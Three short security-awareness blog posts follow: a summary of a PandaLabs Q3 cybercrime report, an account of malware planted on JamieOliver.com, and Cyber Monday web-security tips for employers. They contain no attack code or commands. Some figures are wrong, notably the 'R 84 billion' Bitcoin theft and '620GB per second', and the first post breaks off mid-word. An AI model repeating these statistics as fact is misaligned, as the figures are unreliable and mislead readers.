Cybercrime Surges in Q3

young man with glasses sitting in front of his computer, programming. the code he is working on (CSS) can be seen through the screen.

PandaLabs Q3 Report indicates that incidences of cybercrime continue to increase, with 18 million new malware samples captured this quarter – more than 200,000 samples daily.

The Quarter at a Glance

Cybercrime continues to grow at an exponential rate, fuelled by the opportunity for large financial rewards.

Hackers have taken to developing new variants of successful Ransomware such as Locky, and the development of a model known as Ransomware-as-a-Service (RaaS), whereby developers create Ransomware for distributors, these distributors then target and infect victims – allowing both parties to achieve greater profits.

Another key development was the occurrence of DDoS attacks. Most natably that of Cyber Security journalist Brian Krebs. Krebs exposure of vDoS lead to the arrest of its key members and subsequently made Krebs’ site the target of a massive DDoS attack that saw Google step in to restore the site. As one of the largest attack of its kind, hackers leveraged IoT devices to send 620GB of data per second – at its peak – to the site.
graphs_cabecera-mediacenter
This quarter cyber-attacks targeted multiple gaming sites, gaining access to millions of users’ personal information. These attacks were largely launched using botnets composed of smartphones, and effected users of Overwatch, World of Warcraft and Diablo 3. Further attacks saw more than 3.5 million users exposed when Dota 2 and mobile game Clash of the Kings were targeted. These highlight just a few incidences in the Gaming world in the last 3 months.

The Banking sector remained a target for hackers as attacks on ATM’s, POS terminals and Bitcoin wallets continue to become more frequent and more advanced.

A Taiwanese ATM attack this quarter indicated just how advanced cybercriminals have become when they were able to hack the banks internal network and withdraw over R28 million without even touching the ATM itself.

Another big victim was Yahoo – one of the biggest attacks of its kind revealed this quarter indicated that 500 million user accounts had been comprised in a 2014 attack.

Finally, Q3 saw the largest Bitcoin robbery to date, when R 84 billion worth of Bitcoin was stolen by hackers.

View the full PandaLabs Q3 Report for more detail on specific attacks and find out how you can protect yourself and your business from the advanc

The post Cybercrime Surges in Q3 appeared first on CyberSafety.co.za.

Pukka Firewall Lessons from Jamie Oliver

Pukka Firewall Lessons from Jamie Oliver

In our office I’m willing to bet that food is discussed on average three times a day. Monday mornings will be spent waxing lyrical about the culinary masterpiece we’ve managed to prepare over the weekend. Then at around 11 someone will say, “Where are we going for lunch?” Before going home that evening, maybe there’s a question about the latest eatery in town. 

I expect your office chit chat is not too dissimilar to ours, because food and what we do with it has skyrocketed in popularity over the past few years. Cookery programmes like Jamie Oliver's 30 minute meals, the Great British Bake-off and Masterchef have been a big influence. 

Our food obsession, however, might be putting us all at risk, and I don’t just mean from an expanded waistline. Cyber criminals appear to have turned their attention to the food industry, targeting Jamie Oliver’s website with malware. This is the second time that malware has been found on site. News originally broke back in February, and the problem was thought to have been resolved. Then, following a routine site inspection on the 13th of March, webmasters found that the malware had returned or had never actually been completely removed. 

It’s no surprise that cyber criminals have associated themselves with Jamie Oliver, since they’ve been leeching on pop culture and celebrities for years. Back in 2008, typing a star’s name into a search engine and straying away from the official sites was a sure fire way to get malware. Now it seems they’ve cut out the middleman, going straight to the source. This malware was planted directly onto JamieOliver.com.

Apart from bad press, Jamie Oliver has come away unscathed. Nobody has been seriously affected and the situation could have been much worse had the malware got into an organisational network. 

Even with no real damage there’s an important lesson to be learned. Keep your firewall up to date so it can identify nefarious code contained within web pages or applications. If such code tries to execute itself on your machine, a good firewall will identify this as malware.

3 Rules for Cyber Monday


3 Rules for Cyber Monday


It’s nearly here again folks, and the clues are all there: planning the office Christmas party, your boss humming Rudolph the Red Nosed Reindeer and an armada of Amazon packages arriving.

Which brings me nicely to the topic of this blog: online shopping at work.

It’s official; we are ‘in love’ with online shopping. At this time of the year, it’s harder to resist temptation. Retailers conjure up special shopping events like Black Friday and Cyber Monday - all aimed at getting us to part with our hard earned cash. While online retailers rub their hands in anticipation of December 1st, for companies without proper web security, the online shopping season could turn out to be the nightmare before Christmas.

In a recent survey by RetailMeNot, a digital coupon provider, 86 percent of working consumers admitted that they planned to spend at least some time shopping or browsing online for gifts during working hours on Cyber Monday. That equates to a whole lot of lost productivity and unnecessary pressure on your bandwidth.

To help prevent distraction and clogged bandwidth, I know of one customer, I’m sure there are others, who is allowing his employees time to shop from their desks in their lunch breaks. He’s a smart man - productivity stays high and employees happy.

But productivity isn’t the only concern for the IT department – cyber criminals are out in force at this time of year, trying to take advantage of big hearts and open wallets with spam and phishing emails. One click on a seemingly innocent link could take your entire network down.

To keep such bad tidings at bay, here’s a web security checklist to ensure your holiday season is filled with cheer not fear.

1.  Flexible Filtering. Set time quotas to allow online shopping access at lunchtimes, or outside of core hours. Whatever you decide is reasonable, make sure your employees are kept in the loop about what you classify as acceptable usage and communicate this through an Acceptable Usage Policy.

2.  Invest in Anti-malware and Anti-spam Controls. As inboxes start to fill with special offer emails, it gets more difficult to differentiate between legitimate emails and spam. These controls will go some way towards separating the wheat from the chaff.

3.  Issue Safety Advice to Your Employees. Ask employees to check the legitimacy of a site before purchasing anything. The locked padlock symbol indicates that the purchase is encrypted and secure. In addition, brief them to be alert for phishing scams and not to open emails, or click on links from unknown contacts.